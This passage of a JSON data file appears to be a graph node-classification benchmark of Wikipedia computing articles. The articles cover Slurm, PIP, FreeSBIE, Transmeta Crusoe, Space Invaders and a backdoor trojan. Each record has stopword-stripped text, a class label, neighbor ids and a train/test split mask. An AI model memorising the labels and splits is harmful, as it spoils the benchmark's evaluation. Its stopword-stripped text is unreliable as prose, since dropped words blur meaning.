    "text": "Slurm_Workload_Manager:slurm workload manager slurm workload manager formerly known simple linux utility resource management slurm slurm free open-source job scheduler linux unix-like kernels used many world supercomputers computer clusters provides three key functions slurm workload manager 60 top500 supercomputers slurm uses best fit algorithm based hilbert curve scheduling fat tree network topology order optimize locality task assignments parallel computers slurm began development collaborative effort primarily lawrence livermore national laboratory schedmd linux networx hewlett-packard groupe bull free software resource manager inspired closed source quadrics rms shares similar syntax name reference soda futurama 100 people around world contributed project since evolved sophisticated batch scheduler capable satisfying requirements many large computer centers top500 list powerful computers world indicates slurm workload manager six top ten systems including sunway taihulight 10,649,600 computing cores slurm design modular 100 optional plugins simplest configuration installed configured couple minutes sophisticated configurations provide database integration accounting management resource limits workload prioritization notable slurm features include following following features announced version 14.11 slurm released november 2014 slurm primarily developed work alongside linux distributions although also support posix-based operating systems including bsds freebsd netbsd openbsd slurm also supports several unique computer architectures including slurm available gnu general public license v2 2010 developers slurm founded schedmd maintains canonical source provides development level 3 commercial support training services commercial support also available bright computing bull cray science computing following list useful commands available slurm built ccr allow easier reporting users usage information commands use example use linux command information commands example italicized font commands indicates user supplied information brackets indicate optional flags",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      2135,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      2236,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      3323,
      4360,
      5384,
      7432,
      1291,
      4367,
      5397,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      7497,
      330,
      6988,
      10063,
      5975,
      11095,
      10597,
      10091,
      4463,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      10658,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      1480,
      457,
      1995,
      2529,
      6625,
      8676,
      2021,
      1513,
      5105,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3056,
    "label": 6,
    "text": "Peripheral_Interchange_Program:peripheral interchange program peripheral interchange program pip utility transfer files devices digital equipment corporation computers first implemented pdp-6 architecture harrison dit morse early 1960s subsequently implemented dec operating systems pdp-10 pdp-11 pdp-8 architectures 1970s 1980s digital research implemented pip cp/m mp/m said development named atlatl acronym anything lord anything lord humorously described purpose device-independent file copying tool difficulties time safely copying files devices original pip syntax using left-arrow character ascii-1963 character set flexowriter keyboards time used terminals introduced used later versions ascii without left-arrow character pip allowed syntax underscore character ascii character position left-arrow occupied still supported separate destination source specifications source destination file specification strings consisted device name typically 2 characters device type dk disk lp line printer mt magnetic tape etc unit number 0 7 colon filename extension copying generally permitted file specification made sense late mid 1980s pip still common use tops-10 tops-20 pdp-11 systems gary kildall developed cp/m mp/m based much design file structure command processor operating systems digital equipment rsts/e pdp-11 besides accessing files floppy disk pip command cp/m could also transfer data following special files true device files however handling limited pip two custom devices inp implemented calls fixed locations start pip program intention user oem could patch locations add input output devices 246 bytes free space left program purpose addition usual pip destination=source syntax pip cp/m still allowed old pip destination_source form behaviour documented cp/m generally standard characters could appear file names therefore programs could create filenames containing underscore characters pip could handle",
    "neighbors": [
      10113,
      1412,
      6921,
      1804,
      3216,
      273,
      2198,
      2840,
      2201,
      8474,
      8732,
      2729,
      7849,
      11562,
      8876,
      7983,
      178,
      9907,
      6837,
      4409,
      7999,
      4548,
      7495,
      10067,
      1750,
      5982,
      10083,
      5220,
      1253,
      10475,
      2672,
      4337,
      9329,
      4727,
      11513,
      6778
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3057,
    "label": 7,
    "text": "NewVoiceMedia:newvoicemedia newvoicemedia cloud service company based basingstoke england company contactworld platform uses customer contact technology cloud service connecting customers existing telephone infrastructures using internet pass along previously collected client information agents company works 128 countries numerous large organisations including mobileiron truphone parcelforce canadian cancer society ashley unitt richard pickering founded newvoicemedia 2000 may 2010 newvoicemedia received £4 million us 6.3 million series round funding jonathan gale appointed ceo feb 2011 led company rapid growth series significant fund raising rounds fuelled product development international expansion company received £2.5 million us 4 million august 2011 2013 raised £35.2 million us 55 million via £12.8 million us 20 million round january september raised additional £22.4 million us 35 million 2014 company raised £99 million funding including £32 million us 50 million series e july year march 2015 business insider recognised newvoicemedia one 13 enterprise cloud startups venture capitalist funding 2015 london stock exchange named newvoicemedia one 1,000 companies inspire britain newvoicemedia announced raised additional £21 million us 30 million funding january 2016 several venture capital funds salesforce company total funding reached 141.3 million since inception making one successful startup enterprises uk backed silicon valley investors 2017 newvoicemedia included forbes cloud 100 list positioned 'leader gartner magic quadrant contact centre service western europe january 2018 dennis fois appointed ceo newvoicemedia acquired november 2018 vonage inc us 350 million november 2018",
    "neighbors": [
      4194,
      10090
    ],
    "mask": "None"
  },
  {
    "node_id": 3058,
    "label": 2,
    "text": "FreeSBIE:freesbie freesbie live cd operating system able load directly bootable cd installation process hard disk based freebsd operating system name pun frisbee currently freesbie uses xfce fluxbox freesbie 1.0 based freebsd 5.2.1 released february 27 2004 first version freesbie 2 developed summer 2005 thanks google summer code freesbie 2.0.1 complete rewrite so-called toolkit based freebsd 6.2 released february 10 2007 according distrowatch freesbie project discontinued goals freesbie project",
    "neighbors": [
      7552,
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      8725,
      9625,
      1946,
      9342,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      7483,
      3006,
      11459,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      6371,
      998,
      4073,
      8816,
      2545,
      9201,
      5363,
      7027,
      2421,
      9844,
      11506,
      2424,
      1273,
      1150,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3059,
    "label": 0,
    "text": "Kathleen_McKeown:kathleen mckeown kathleen mckeown american computer scientist specializing natural language processing currently henry gertrude rothschild professor computer science director institute data sciences engineering columbia university mckeown received b.a brown university 1976 phd computer science 1982 university pennsylvania spent career columbia first woman tenured university school engineering applied science first woman serve chair department computer science 1998 2003 also served vice dean research school engineering applied science held positions president vice president secretary-treasurer association computational linguistics board member secretary board computing research association mckeown research focuses natural language processing included newsblaster multi-document summarization program derive summary news stories contents number news sites years included multilingual news",
    "neighbors": [
      7780,
      9522,
      7724
    ],
    "mask": "None"
  },
  {
    "node_id": 3060,
    "label": 9,
    "text": "Carlo_Ghezzi:carlo ghezzi carlo ghezzi professor chair software engineering politecnico di milano italy adjunct professor università della svizzera italiana usi switzerland politecnico rector delegate research department chair head phd program member academic senate board governors politecnico received dr.eng degree electrical engineering politecnico di milano spent professional life assistant associate full professor also taught research institutions university california los angeles usa 1976 university north carolina chapel hill usa 1979–80 università degli studi di padova italy 1980–81 escuela superior latinoamericana de informática argentina 1990 university california santa barbara usa 1991 technical university vienna austria 1996 university klagenfurt austria 1996 ghezzi 1999 acm fellow citation numerous research contributions compiler theory real-time systems software processes strong contributor software engineering community europe worldwide 2006 ieee fellow citation contributions programming languages software engineering 2006 awarded acm sigsoft distinguished service award member regular member program committee important conferences software engineering field international conference software engineering icse foundations software engineering fse conference jointly held conjunction european software engineering conference esec chairing conferences program co-chair icse 1991 program chair esec/fse '99 general chair icse 2000 general co-chair international conference service oriented computing icsoc 2006 keynote speaker several conferences including esec 1993 ieee international conference software maintenance icsm 1997 european joint conference theory practice software etaps 2006 icse 2009 ieee international conference engineering complex computer systems iceccs 2010 ieee international conference software engineering formal methods sefm 2010 international symposium empirical software engineering measurement esem 2010 servicewave servicewave 2010 fundamentals software engineering fsen 2011 editor chief acm transactions software engineering methodology 2001–2006 associate editor ieee transactions software engineering currently associate editor science computer programming elsevier service oriented computing applications springer science+business media software process improvement practice john wiley sons research constantly focused different facets software engineering programming languages currently active area software architectures especially evolvable distributed software architectures ubiquitous pervasive computer applications long-term goal contribute making software dependable basing solid rigorous methodological theoretical foundations ghezzi co-authored 180 papers almost published internationally papers appeared prestigious journals like journal acm information control information computation acm transactions software engineering methodology acm transactions programming languages systems ieee transactions software engineering co-author 8 books including 2008 awarded advanced investigators grant european research council funding smscom project",
    "neighbors": [
      1783
    ],
    "mask": "Train"
  },
  {
    "node_id": 3061,
    "label": 2,
    "text": "HP-1000/RTE:hp-1000/rte hp-1000/rte hp product code 2171a real-time computer system first produced hewlett packard 1966 discontinued november 2000 hp 1000 series runs rte real-time operating system initially technical applications electronic data capture mainly store data captured used also analyse data captured generate graphics reports later operating system used also small commercial applications mainly inside industries small factories hp 9000 systems became able handle real-time processes rte systems declined",
    "neighbors": [
      9599,
      7983,
      9366,
      6207
    ],
    "mask": "Train"
  },
  {
    "node_id": 3062,
    "label": 2,
    "text": "Chain_loading:chain loading chain loading method used computer programs replace currently executing program new program using common data area pass information current program new program occurs several areas computing chain loading similar use overlays unlike overlays however chain loading replaces currently executing program entirety overlays usually replace portion running program like use overlays use chain loading increases i/o load application operating system boot manager programs chain loading used pass control boot manager boot sector target boot sector loaded disk replacing in-memory boot sector boot manager bootstrapped executed unix unix-like operating systems exec system call used perform chain loading program image current process replaced entirely new image current thread begins execution image common data area comprises data process environment variables preserved across system call addition exec process level chain loading linux supports kexec system call replace entire operating system kernel different version new kernel boots started power running processes preserved basic programs chain loading purview codice_1 statement commodore basic codice_2 statement causes current program terminated chained-to program loaded invoked dialects basic support optional parameter specifying line number execution commence rather default first line new program common data area varies according particular dialect basic use bbc basic example specific subset variables preserved across chain basics codice_3 statement used conjunction codice_1 specify variables preserved common data across chain operation chain loading permits basic programs execute program code could fit available program variable memory applications written basic could thus far larger size working memory via set cooperating programs codice_1 back forth amongst program flow moves within overall application many versions fortran include codice_6 statement performs chain loading preserving contents common storage unrelated codice_7 subroutine gnu fortran os/360 successors use codice_8 transfer control macro chain loading operating system memory management may may result replacement code calling program memory",
    "neighbors": [
      7872,
      3138,
      868,
      7847,
      4968,
      8429,
      8494,
      10063,
      5363,
      5492,
      5397,
      7032,
      823,
      3960,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 3063,
    "label": 7,
    "text": "Cluster_Computing_(journal):cluster computing journal cluster computing journal networks software tools applications peer-reviewed scientific journal parallel processing distributed computing systems computer communication networks journal established 1998 2016 journal journal citation reports impact factor 2.040",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3064,
    "label": 2,
    "text": "Network_Policy_Server:network policy server network policy access services npas component windows server 2008 replaces internet authentication service ias windows server 2003 npas helps safeguard health security network npas server role includes network policy server nps health registration authority hra host credential authorization protocol hcap windows server 2003 ias microsoft implementation remote authentication dial-in user service radius server windows server operating systems later windows server 2003 ias renamed nps npas role service windows server 2008 function npsee enables use heterogeneous set wireless switch remote access vpn equipment one use nps routing remote access service available microsoft windows 2000 windows server 2003 standard edition windows server 2003 enterprise edition windows server 2003 datacenter edition server running nps member active directory domain services ad ds domain nps uses directory service user account database part single sign-on solution set credentials used network access control authenticating authorizing access network log ad ds domain",
    "neighbors": [
      929,
      9442,
      4074,
      10058,
      6797
    ],
    "mask": "Train"
  },
  {
    "node_id": 3065,
    "label": 4,
    "text": "Backdoor.Win32.Seed:backdoor.win32.seed backdoor.win32.seed definition backdoor trojan first known detection goes back february 7th 2005 according securelist kaspersky labs meanwhile several variants malware self-replicate non-a.i. backdoor.win32.seed spread manually often premise .exe file something beneficial distribution channels include irc peer-to-peer networks newsgroup postings e-mails",
    "neighbors": [
      704,
      7809,
      10756,
      1994,
      202,
      107,
      10987,
      8959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3066,
    "label": 7,
    "text": "Process_migration:process migration computing process migration specialized form process management whereby processes moved one computing environment another originated distributed computing used widely multicore machines multiple cores one processor multiple processors process migration happens standard part process scheduling quite easy migrate process within given machine since resources memory files sockets need changed execution context primarily program counter registers traditional form process migration computer clusters processes moved machine machine significantly difficult requires serializing process image migrating reacquiring resources new machine process migration implemented among others openmosix pioneered sprite os university california berkeley process migration computing comes two flavors several problems occur running process moves another machine problems i/o redirection process i/o files devices bound certain machine must way redirect access resources even process migrated involves redirection i/o data stream network disadvantages concerning security performance reliability inter-process communication messages sent process process id p machine redirected new machine n new process id q machine process migrated away needs keep records migrated processes multiple migration occurs overhead increases shared memory one group cooperating processes migrates away processes use shared memory segment network must used emulate shared memory access adds complexity slows access shared memory dramatically processes migrated away machine holding shared memory phenomena host computer must provide services process migrated away called residual dependency addition problems mentioned process based operating systems usually maintain variety tables states running processes simple way retrieve administrative information process simple sequence copy operations depending execution process tables need searched copied altered re-established destination system thus process state replication simple task reference http //www.klammeraffe.org/~fritsch/uni-sb/fsinfo/papers/migrate/node4.html alternate definition process migration used integrated circuit design engineering process migration layout migration context design flow change shrink existing ic layout new process technology node implementation process migration could done manually redrawing layout feature feature automatic eda/cad tools load sharing systems process migrated one node another using mechanism called process migration concept process introduced report processes well-known design operating systems process migration refers mobility executing suspended processes distributed computing environment usually term indicates process uses network migrate another machine continue execution sometimes term used describe change execution one processor another processor within machine",
    "neighbors": [
      8992,
      4423,
      9739,
      5452,
      11501,
      4238,
      4112,
      7189,
      118,
      3197,
      9887
    ],
    "mask": "Test"
  },
  {
    "node_id": 3067,
    "label": 9,
    "text": "Parser_Grammar_Engine:parser grammar engine parser grammar engine pge originally parrot grammar engine compiler runtime perl 6 rules parrot virtual machine pge uses rules convert parsing expression grammar parrot bytecode therefore compiling rules program unlike virtual machines runtimes store regular expressions secondary internal format interpreted runtime regular expression engine rules format used pge express regular expression formal grammars forms first link compiler chain parrot front-end languages executed bytecode generated pge parse text described input rules generating parse tree parse tree manipulated directly fed next stage parrot compiler toolchain order generate ast code generation occur grammar describes programming language originally named p6ge written c pge translated native parrot renamed long initial release november 2004 author patrick r. michaud pge written order reduce amount work required implement compiler top parrot also written allow perl 6 easily self-host though current pugs development longer uses pge primary rules back-end favor native engine called pcr pge combines three styles parsing primary form perl 6 rules pge rule might look like addition-only grammar operator precedence parser allows operator table built used directly perl 6 rule style parser like accomplishes goal defining simple addition-only grammar using combination perl 6 style regex/rules codice_1 codice_2 shift-reduce optable everything else though pge outputs code parse grammar described rule used run time handle simple grammars regular expressions found code primary purpose parsing high level languages parrot compiler toolchain broken several parts pge first pge converts source code parse trees tree grammar engine tge converts parrot abstract syntax trees past second tge pass converts past parrot opcode syntax trees post directly transformed executable bytecode",
    "neighbors": [
      1952,
      9330,
      3413
    ],
    "mask": "Test"
  },
  {
    "node_id": 3068,
    "label": 2,
    "text": "Debian_GNU/Hurd:debian gnu/hurd debian gnu/hurd flavor debian operating system based hurd microkernel instead common debian kernels linux freebsd debian gnu/hurd development since 1998 made formal release may 2013 78 software packaged debian gnu/linux ported gnu hurd debian gnu/hurd developers hoping able release debian wheezy 2013 however hurd yet official debian release maintained developed unofficial port according gnu/hurd compatibility guide current version compatible laptops pcmcia support yet 2019 debian gnu/hurd several shortcomings among offered i386 uses ext2 filesystem dhcp work roadmap includes plans migrate ext4 filesystem using dhcp machine hang boot debian gnu/hurd distributed installer cd running official debian installer ready-to-run virtual disk image live cd live usb cd uses ia-32 architecture making compatible ia-32 x86-64 pcs current version debian gnu/hurd 2019 published july 2019",
    "neighbors": [
      2050,
      2180,
      5380,
      11654,
      4493,
      10257,
      11410,
      1939,
      7187,
      2197,
      5397,
      8727,
      4123,
      8476,
      4637,
      10016,
      802,
      3618,
      7983,
      5555,
      9148,
      9407,
      10687,
      4929,
      10822,
      5703,
      5833,
      5962,
      5067,
      8147,
      3674,
      2010,
      10464,
      3685,
      9579,
      5356,
      9324,
      8304,
      1394,
      4978,
      5363,
      3317,
      246,
      7027,
      8436,
      9074,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 3069,
    "label": 3,
    "text": "Might_and_Magic_Book_One:_The_Secret_of_the_Inner_Sanctum:might magic book one secret inner sanctum might magic book one secret inner sanctum also known simply might magic early role-playing video game first popular influential might magic franchise released 1986 new world computing debut ported numerous platforms re-released continuously early '90s original apple ii version game written almost single-handedly jon van caneghem three years van caneghem difficulty finding publisher distribute might magic self-published new world computing handling distribution apartment able broker distribution deal activision due popularity game ported number platforms popular time nine sequels released next fifteen years port might magic released nintendo entertainment system 1992 basic gameplay similar ports released earlier platforms graphics general polish game reflected later release date greater capability nintendo platform game remade release japan pc engine platform version game released cd-rom² rather cartridge able feature digitized voices dialogue result increased storage capacity offered cd medium game later included limited edition special edition game set world varn features expansive outdoor terrain castles caves underground cities astral plane game centers six adventurers trying discover secret inner sanctum kind holy grail quest trying discover inner sanctum heroes discover information mysterious character named corak hunt missing villain sheltem end unmasking sheltem masquerading king defeating evil machinations end game go gates another world travel cron knowing sheltem also escaped world although appears take place straightforward medieval fantasy setting knights armor mythical monsters magicians number science fiction elements revealed later game actual meaning varn vehicular astropod research nacelle relatively common trait early crpgs also seen oldest ultima wizardry titles example sheltem plot first introduced adventurers visit site crashed space ship told aliens prisoner large world characters might magic successors defined number rules conforming loosely fantasy role-playing archetypes characters statistics analogous dungeons dragons ability scores might endurance accuracy personality intelligence luck six character classes player assigns character race creation time human elf half-orc gnome dwarf affects character starting statistics resistance various forms attack alignment also chosen characters party acts collectively time implications minimal alignment plays part game particular determine reward one game quests characters also male female like alignment gender serves minimal purpose game save situations notably city portsmith males males injured stepping certain areas city character gender changed back forth via certain actions within game world two types magic spells might magic sorcerer spells clerical spells sorcerer spells available sorcerer archer characters clerical spells available cleric paladin characters daily spellcasting ability limited character spell points users sorcerer spells number spell points available depends character intelligence statistic clerical spellcasters number spell points depends character personality statistic sorcerer spells tend offensive nature inflicting damage enemy creatures clerical spells usually defensive focusing healing defense removal poison undesirable effects world presented labyrinth utilizing first person perspective interface similar employed bard tale gaming world divided maze-like grid player movement options move forward backward turn ninety degrees left right walls represent mountain ridges cave stone rows trees whatever obstruction might expected terrain explored exploration like combat turn-based might magic hence in-game time pass player delays party moves place hostile creatures random encounter occurs game switches combat phase hostile creatures encountered player usually given option run away attempt surrender creatures try bribe attack player elects attack combat evasion attempt fails game enters combat mode platforms combat interface presented text-only format turn-based combat conducted combatant acting order speed statistic round random speed bonus applied either player party enemy creatures player-character turn player selects action list options including attacking creature casting spell attempting run away combat ends combatants one side either rendered unconscious dead usually hit points reduced zero fled combat player also lose combat allowing members party succumb sleep paralysis effects might magic sold 100,000 copies 1989 1987 compute magazine praised might magic wealth content non-linear play aspects graphics though notes game graphics lack animation limited graphical representation enemy combatants scorpia computer gaming world similarly praised game extensiveness noted early versions game equipped new party members clubs making beginning game difficult 1988 might magic joined magazine hall fame games highly rated time readers 1993 magazine stated despite starting difficulty well worth effort 1996 magazine named might magic 23rd best game ever editors wrote 3d dungeon view combined biggest world map date two major features advanced level crpg apple ii version game reviewed 1987 dragon 122 patricia lesser role computers column lesser stated adventure awesome scope completely fascinating graphically pleasing one top five games ever produced computer subsequent column reviewers gave game 5 5 stars hartley patricia kirk lesser reviewed ibm version game 1988 dragon 132 also giving 5 5 stars lessers reviewed macintosh version game dragon 140 giving macintosh ii version 4½ stars macintosh plus version 3½ stars modern commentators acknowledge mm1 immense scope world freedom exploration pioneering aspects incorporating player characters race gender alignment gameplay",
    "neighbors": [
      9166,
      9006,
      1063
    ],
    "mask": "Test"
  },
  {
    "node_id": 3070,
    "label": 3,
    "text": "List_of_AMD_CPU_microarchitectures:list amd cpu microarchitectures following list amd cpu microarchitectures historically amd cpu families given k-number originally stood kryptonite allusion superman comic book character fatal weakness starting first internal x86 cpu design k5 represent generational changes amd used k-nomenclature codenames official amd documents press releases since beginning 2005 k8 described athlon 64 processor family amd refers codename k8 processors family 0fh processors 10h 0fh refer main result cpuid x86 processor instruction hexadecimal numbering 0f h h represents hexadecimal numbering equals decimal number 15 10 h equals decimal number 16 k10h form sometimes pops improper hybrid k code family xxh identifier number family hexadecimal identifier number determined particular processor using freeware system profiling application cpu-z shows family number ext family field application seen various screenshots cpu-z validator world records website list microarchitectures many codenames associated",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      4742,
      6151,
      8327,
      10375,
      6924,
      5645,
      398,
      6797,
      8851,
      7963,
      2719,
      10658,
      5541,
      11047,
      2094,
      6978,
      7234,
      11080,
      2764,
      5326,
      977,
      5844,
      9428,
      473,
      5859,
      8035,
      5356,
      1005,
      9964,
      5871,
      1776,
      1137,
      10734,
      499,
      2549
    ],
    "mask": "Test"
  },
  {
    "node_id": 3071,
    "label": 3,
    "text": "Transmeta_Crusoe:transmeta crusoe crusoe family x86-compatible microprocessors developed transmeta introduced 2000 crusoe notable method achieving x86 compatibility instead instruction set architecture implemented hardware translated specialized hardware crusoe runs software abstraction layer virtual machine known code morphing software cms cms translates machine code instructions received programs native instructions microprocessor way crusoe emulate instruction set architectures isas used allow microprocessors emulate intel x86 instruction set theory possible cms modified emulate isas transmeta demonstrated crusoe executing java bytecode translating bytecodes instructions native instruction set addition abstraction layer x86 instruction stream hardware means hardware architecture change without breaking compatibility modifying cms example transmeta efficeon — second-generation transmeta design — 256-bit-wide vliw core versus 128-bit core crusoe crusoe performs software functionality traditionally implemented hardware e.g instruction re-ordering resulting simpler hardware fewer transistors relative simplicity hardware means crusoe consumes less power therefore generates less heat x86-compatible microprocessors running frequency 700 mhz crusoe ran x86 programs speed 500 mhz pentium iii x86 processor although crusoe processor smaller cheaper corresponding intel processor crusoe available two cores tm3200 embedded applications tm5400 low-power personal computing based architecture differed clock frequency peripheral support tm3200 operated clock frequencies 333–400 mhz 64 kb instruction cache 32 kb data cache l2 cache tm3200 integrated memory controller supports sdram pci interface measures 77 mm² uses 1.5 v power supply dissipating less 1.5 w power typical tm5400 operated clock frequencies 500–800 mhz unlike tm3200 tm5400 longrun power reduction technology 64 kb instruction cache 64 kb data cache 256 kb unified l2 cache integrated memory controller supports sdram ddr sdram also pci interface measures 73 mm² uses 1.10 v 1.6f v power supply dissipating 0.5–1.5 w typically maximum 6 w. transmeta fabless semiconductor company facilities fabricate designs fabricated ibm microelectronics semiconductor business international business machines ibm ibm fabricated crusoe 0.18 µm cmos process five levels copper interconnect crusoe vliw microprocessor executes bundles instructions termed molecules transmeta molecule contains multiple instructions termed atoms code morphing software translates x86 instructions native instructions native instructions 32 bits long instructions meet set conditions executed simultaneously combined form 64- 128-bit molecule containing two four atoms respectively event enough instructions fill molecule software inserts nops padding fill empty slots required vliw architectures criticised inefficient molecules two separate lengths transmeta crusoe new generation processor provide variable operating modes due dynamic core vary voltage frequency dynamically dynamic load frequency range dynamic voltage provides 300 mhz-1.20 v 400 mhz-1.23 v 500 mhz-1.35 v,600 mhz-1.53 v,700 mhz-1.75 v 800 mhz-2.00 v 900 mhz-2.35 1000 mhz- 2.80 v. vary ranges depending upon load optimum minimum load respective frequencies voltages get changed",
    "neighbors": [
      8609,
      10786,
      7941,
      1798,
      8266,
      3470,
      5134,
      5358,
      8625,
      499,
      5235,
      725,
      630,
      5844,
      9309,
      1915,
      1820,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 3072,
    "label": 4,
    "text": "Operation:_Bot_Roast:operation bot roast operation bot roast operation fbi track bot herders crackers virus coders install malicious software computers internet without owners knowledge turns computer zombie computer sends spam computers compromised computer making botnet network bot infected computers operation launched vast scale botnet resources poses threat national security operation created disrupt disassemble bot herders june 2007 fbi identified 1 million computers compromised leading arrest persons responsible creating malware process owners infected computers notified many unaware exploitation early results operation include charges following",
    "neighbors": [
      10756,
      10245,
      9227,
      9233,
      9242,
      9761,
      4648,
      9256,
      9771,
      46,
      10297,
      3643,
      7739,
      9791,
      1088,
      4165,
      81,
      8789,
      2147,
      107,
      3704,
      10875,
      5245,
      6786,
      5764,
      3724,
      9356,
      4245,
      10392,
      1690,
      5281,
      2213,
      8387,
      10952,
      10457,
      4314,
      3807,
      1254,
      10477,
      4344,
      3320,
      5886,
      4863,
      1279,
      3852,
      7441,
      8978,
      3347,
      4883,
      2325,
      278,
      3867,
      8998,
      300,
      7996,
      11583,
      3395,
      7515,
      8032,
      3941,
      11621,
      877,
      4462,
      8045,
      9591,
      6520,
      10110,
      9087,
      7044,
      9102,
      10141,
      9630,
      10657,
      939,
      1970,
      4023,
      6588,
      9664,
      9154,
      8133,
      2508,
      3032,
      988,
      5087,
      9187,
      2041,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 3073,
    "label": 2,
    "text": "Klaus_Knopper:klaus knopper klaus knopper born 1968 ingelheim german electrical engineer free software developer knopper creator knoppix well-known live cd linux distribution received degree electrical engineering kaiserslautern university technology german technische universität kaiserslautern co-founded linuxtag 1996 major european linux expo self-employed information technology consultant since 1998 also teaches kaiserslautern university applied sciences knopper married adriane knopper visual impairment assisting knopper version knoppix blind visually impaired people released third quarter 2007 live cd name given distribution adriane knoppix adriane desktop non-graphical-userinterface blind computer beginners distribution work linux distribution screenreader preferably sbl screenreader blind linux users text-based tools internet access normal work",
    "neighbors": [
      4841,
      9902,
      823,
      9693,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3074,
    "label": 3,
    "text": "Head_Over_Heels_(video_game):head heels video game head heels action-adventure video game released ocean software 1987 several 8-bit home computers subsequently ported wide range formats working title game foot mouth uses isometric engine similar filmation technique first developed ultimate head heels second isometric game jon ritman bernie drummond earlier batman computer game released 1986 1994 another isometric video game ritman drummond monster max released nintendo game boy player controls two characters instead one different abilities head jump higher heels control air fire doughnuts hooter paralyze enemies heels run twice fast head climb certain staircases head carry objects around room bag abilities become complementary player combines together completing roughly sixth game compared predecessors game offers unique revolutionary gameplay complex puzzles 300 rooms explore drummond contributed famously surreal touches including robots controlled push switches bore remarkable resemblance head prince charles body dalek surreal touches include enemies heads elephants staircases made dogs teleport away soon head enters room headus mouthion head footus underium heels two spies planet freedom sent blacktooth liberate enslaved planets penitentiary safari book world egyptus defeat emperor prevent planets falling rule captured separated spies placed prison headquarters castle blacktooth must first escape break market orbiting moonbase teleport planets locate reobtain stolen crowns liberation planets defeat emperor allow head heels return freedom heroes 2003 retrospec released remake head heels microsoft windows mac os x beos linux 2019 piko interactive released atari st port head heels atari jaguar jon ritman re-used modified isometric engine created batman support control 2 players instead 1 modifications made code c64 version lower processor load end little difference versions",
    "neighbors": [
      6797,
      823,
      9006,
      10931,
      983,
      921,
      5820
    ],
    "mask": "Train"
  },
  {
    "node_id": 3075,
    "label": 3,
    "text": "Space_Invaders:space invaders space invaders immediate commercial success 1982 grossed 3.8 billion net profit 450 million making best-selling video game highest-grossing entertainment product time adjusted inflation many versions game estimated grossed 13 billion total revenue 2016 making highest-grossing video game time space invaders considered one influential video games time helped expand video game industry novelty global industry ushered golden age arcade video games inspiration numerous video games game designers across different genres ported re-released various forms 1980 atari vcs version quadrupled sales vcs thereby becoming first killer app video game consoles broadly pixelated enemy alien become pop culture icon often representing video games whole designer nishikado drew inspiration games like 1976 ball-bouncing game breakout 1975 shooter game gun fight well science fiction narratives war worlds space battleship yamato star wars complete development game design custom hardware development tools space invaders fixed shooter player controls laser cannon moving horizontally across bottom screen firing descending aliens aim defeat five rows eleven aliens—although versions feature different numbers—that move horizontally back forth across screen advance toward bottom screen player laser cannon partially protected several stationary defense bunkers—the number also varies version—that gradually destroyed top bottom blasts either aliens player player defeats alien earns points shooting laser cannon aliens defeated aliens movement game music speed defeating aliens on-screen brings another wave difficult loop continue endlessly special mystery ship occasionally move across top screen award bonus points destroyed aliens attempt destroy player cannon firing approach bottom screen reach bottom alien invasion declared successful game ends tragically otherwise ends generally player last cannon destroyed enemy projectiles space invaders created japanese designer tomohiro nishikado spent year designing game developing necessary hardware produce game inspiration reported come varying sources including adaptation mechanical game space monsters released taito 1972 dream japanese school children waiting santa claus attacked invading aliens nishikado cited atari arcade game breakout inspiration aimed create shooting game featured sense achievement completing stages destroying targets complex graphics game uses similar layout breakout altered game mechanics rather bounce ball attack static objects players given ability fire projectiles moving enemies early enemy designs game included tanks combat planes battleships nishikado however satisfied enemy movements technical limitations made difficult simulate flying humans would easier simulate designer considered shooting immoral release 1974 anime space battleship yamato japan seeing magazine feature star wars thought using space theme nishikado drew inspiration aliens novel h. g. wells war worlds created initial bitmap images octopus-like aliens alien designs modeled squids crabs game originally titled space monsters popular song japan time changed space invaders designer superiors microcomputers japan powerful enough time perform complex tasks involved designing programming space invaders nishikado design custom hardware development tools game created arcade board using latest microprocessors united states game uses intel 8080 central processing unit cpu displays raster graphics crt monitor uses monaural sound hosted combination analog circuitry texas instruments sn76477 sound chip adoption microprocessor inspired gun fight 1975 midway microprocessor adaptation nishikado earlier discrete logic game western gun designer impressed improved graphics smoother animation midway version despite specially developed hardware nishikado unable program game wanted—the control program board powerful enough display graphics color move enemies faster—and ended considering development game hardware difficult part whole process programming game nishikado discovered processor able render alien graphics faster fewer screen rather design compensation speed increase decided keep challenging gameplay mechanism space invaders first released cocktail-table format arcade cabinet black-and-white graphics midway released western version upright cabinet used strips orange green cellophane screen simulate color graphics graphics reflected onto painted backdrop moon starry background later japanese releases used rainbow-colored cellophane t.t space invaders 1978 eventually followed version full-color display cabinet artwork features large humanoid monsters present game nishikado attributes artist basing designs original title space monsters rather referring actual in-game graphics despite simplicity music space invaders revolutionary gaming industry time video game scholar andrew schartmann identifies three aspects music significant impact development game music first months following release japan space invaders became popular specialty arcades opened nothing space invaders cabinets end 1978 taito installed 100,000 machines grossed 600 million japan alone 1980 taito sold 300,000 space invaders arcade machines japan 